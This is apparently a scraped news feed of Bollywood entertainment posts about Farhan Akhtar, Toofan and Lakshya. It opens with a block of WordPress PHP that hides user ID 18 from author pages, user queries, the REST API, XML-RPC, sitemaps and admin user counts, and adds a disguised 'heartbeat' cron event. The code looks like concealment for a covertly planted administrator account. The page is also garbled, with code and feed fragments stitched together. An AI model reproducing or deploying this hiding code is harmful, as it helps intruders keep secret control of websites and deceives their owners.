add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Farhan Akhtar addresses criticism from trolls on Arbaaz Khan’s chat show appeared first on The Edge Media.
]]>During the episode, Farhan responded to a comment calling him a ‘flop hero,’ who only has one hit film that too because it was a biopic on the late athlete Milkha Singh. Responding to which he said, “Iss flop hero ke zariye aapko Milkha ji ki kahani dekhne mil gayi, ussi se main khush hoon.”
Another troll said that Farhan should come out of his ‘Rock On mode’. “It’s like telling Jaggu dada to come out of his ‘Bhidu’ mode, you can’t tell him to do that, that’s who he is,” he replied.
The actor then laughed off a comment criticising his ‘phati hui awaaz’. Farhan was also compared to ‘thousand croaking frogs’
To this he replied, “This is a part of my social service extension. I want people to stay and home and listen to me. Be it the songs of Rock On, Zindagi Na Milegi Dobara, Atrangi Yaari, which I got to do with Mr (Amitabh) Bachchan, all the songs have done well. But, of course, I totally understand that my voice is not a conventional playback singer’s voice. There is a certain quality of work that is associated with playback singing. My skill level or tone is not in that vicinity. So I don’t sing for other people. I absolutely enjoy it, and I am not apologetic about it at all.”
Farhan talked about watching Don as a child. He admitted being a big fan of Amitabh Bachchan. The actor revealed he got scared when he saw Big B in Don. “This is my hero and he is such a vicious, mean, violent person. I told Zoya (sister Zoya Akhtar), that Don is such an amazing film and it would translate so well into today’s time,” he said. The idea of remaking Don was born during the same conversation with Zoya. He mentioned that he wondered how to bring a fresh and new perspective to the film.
Also, Arbaaz gave Farhan a challenge to make up a verse on the spot using ‘shiddat’, ‘mehfooz’ and ‘uns’. While Farhan came up with a few lines, the actor joked he will be disowned by his family. “Iske baad main jaaydaad se bedakhal kiya jaunga,” he said.
In the episode, Farhan said, “I’m inactive these days (on social media), as I needed a detox from social media. There was a time when I had got into a tussle with trollers. But then the thing is, either you get stuck in a never-ending process by responding, or you realise that you have a life beyond social media, and you take an exit.”
The post Farhan Akhtar addresses criticism from trolls on Arbaaz Khan’s chat show appeared first on The Edge Media.
]]>The post Riddhima Kapoor Sahni and Farhan Akhtar releases the first look of Rishi Kapoor from his last film titled Sharmaji Namkeen appeared first on The Edge Media.
]]>They also expressed gratitude to Paresh Rawal to step into the shoes of Rishi Kapoor to complete the movie. The caption read further, “A big thank you to Mr. Paresh Rawal, who completed the film by agreeing to take the sensitive step of portraying the same character played by Rishi-ji. Produced by Excel Entertainment and Macguffin Pictures, directed by debutant Hitesh Bhatia, this film is a light-hearted coming-of-age story of a lovable 60-year-old-man.”
Farhan also shared another poster featuring Paresh Rawal.
For those unversed, Rishi Kapoor breathed his last on April 30, 2020, after a two-year battle with leukemia. He was 67. Prior to his demise, Rishi was in New York for his treatment with his wife. The couple got married on January 22, 1980, and share two children together, Riddhima and superstar Ranbir Kapoor.
The post Riddhima Kapoor Sahni and Farhan Akhtar releases the first look of Rishi Kapoor from his last film titled Sharmaji Namkeen appeared first on The Edge Media.
]]>The post Toofan becomes the most watched video on Amazon Prime Video appeared first on The Edge Media.
]]>Actor Farhan Akhtar’s ‘Toofan’ is on top position as the most watched video within first week of its release globally.
According to the data released by the OTT platform, the Rakeysh Omprakash Mehra directorial was watched by more customers on Prime Video India than any other Hindi film in its opening week. The film was viewed in over 3,900+ towns and cities in India and in 160+ countries and territories across the globe.
Besides this, in the local languages catagory, films ‘Narappa’ (Telugu), ‘Sarpatta Parambarai’ (Tamil) and ‘Malik’ (Malayalam), were each watched in over 3,200+ towns and cities in India and in over 150+ countries and territories globally.
In the catagory of web shows, Adarsh Gourav’s ‘Hostel Daze (S2)’ emerged as one of the most loved shows amongst young adults within just a week of its launch, with viewership from 3,600+ towns and cities in India and from over 100+ countries and territories around the world.
The data comes to light as Amazon marked July 26 and July 27 as Prime Days. Prime Day 2021 marked the most Small Medium Businesses (SMBs) selling on Amazon.in ever, as they saw an overwhelming response from Prime members.
The post Toofan becomes the most watched video on Amazon Prime Video appeared first on The Edge Media.
]]>The post Toofan made it to a new billboard at New York’s Times Square. appeared first on The Edge Media.
]]>Along with a video clip, Farhan shared in the caption, “I remember the first time I went to Times Square in NYC .. looking up at all those billboards and thinking wouldn’t it be cool to have a film represented here..! Well, today that dream came true .. courtesy Amazon Prime Video who are taking Toofaan across the Atlantic in all its powerful glory. To all my family, friends and fans in the US, this one is for you. #toofaanonprime #16thjuly.”
https://www.instagram.com/p/CRQrQG5gkk7/?utm_medium=copy_link
Presented by Amazon Prime Video in association with Excel Entertainment and ROMP Pictures. Toofaan is produced by Ritesh Sidhwani, Rakeysh Omprakash Mehra and Farhan Akhtar, the sports drama is directed by Rakeysh Omprakash Mehra. Toofaan is all set to premiere worldwide on 16 July, 2021 on Amazon Prime Video in English and Hindi.
The post Toofan made it to a new billboard at New York’s Times Square. appeared first on The Edge Media.
]]>The post Toofan can be described as as a mix of Rang De Basanti and Bhaag Milkha Bhaag : Rakeysh Omprakash Mehra appeared first on The Edge Media.
]]>At the trailer launch event for Toofan on Wednesday, Rakeysh Omprakash Mehra was asked the difference between working on a sports biopic and a sports drama. While Rang De Basanti was fictional tale, Bhaag Milkha Bhaag was a biopic on sprinter Milkha Singh, and Toofan is a fictional sports drama about a boxer.
Responding to the question, the filmmaker told reporters, “When we started working on Toofan, I realised boxing is a contact sport. It is not like others. Here, you need to hit the other person. Unlike cricket, or football, or athletics. You are running but in different tracks. In boxing, you have to hit, how to fake a contact? The whole physicality and mental makeup, how to go for that?”
Of course there are all these rules about safety and all. But you need to touch and hit the opponent. What if a person is averse to touch? If I were to put Rang De Basanti and Bhaag Milkha Bhaag in a mixer grinder, what will come out is Toofan,” the filmmaker said.
The post Toofan can be described as as a mix of Rang De Basanti and Bhaag Milkha Bhaag : Rakeysh Omprakash Mehra appeared first on The Edge Media.
]]>The post Lakshya completes 17 years today appeared first on The Edge Media.
]]>Calling it a life experience, Farhan thanked everyone involved with the project. Sharing a montage of clips from the film, the actor-director wrote, “Forever grateful to the Indian army for supporting us and to the incredibly dedicated & tenacious cast & crew who collaborated on this life experience .. I won’t call it a film, because it’s always been more than that. Lakshya. 17 years.
.”


Preity Zinta, who played a war journalist in Lakshya also took to Instagram to remember the film. Sharing that it was her ‘toughest film ever’, the actor added that it’s also a ‘love letter to all army brats’. “Remembering Lakshya today – My toughest film ever. Filming at 18000+feet in Ladakh was brutal & beautiful at the same time. I’m so proud of this film & everything it stood for. It definitely is a love letter to all the army brats out there
It’s also a reminder to never forget all those sacrifices & the unmatched bravery of our armed forces
Thank you @amitabhbachchan ji @faroutakhtar @hrithikroshan @ritesh_sid @zoieakhtar @reemakagti1 @jaduakhtar @shankarehsaanloy & the entire cast n crew for this memorable experience. #17yearsofLakshya #Memories #Jaihind #Ting,” wrote Preity Zinta.

Lakshya, a coming-of-age story, was set against the 1999 Kargil War. A major part of the film was shot in Ladakh, and actual army officers were also part of the shoot. Hrithik Roshan’s fans still consider the film as one of his best performances.
The post Lakshya completes 17 years today appeared first on The Edge Media.
]]>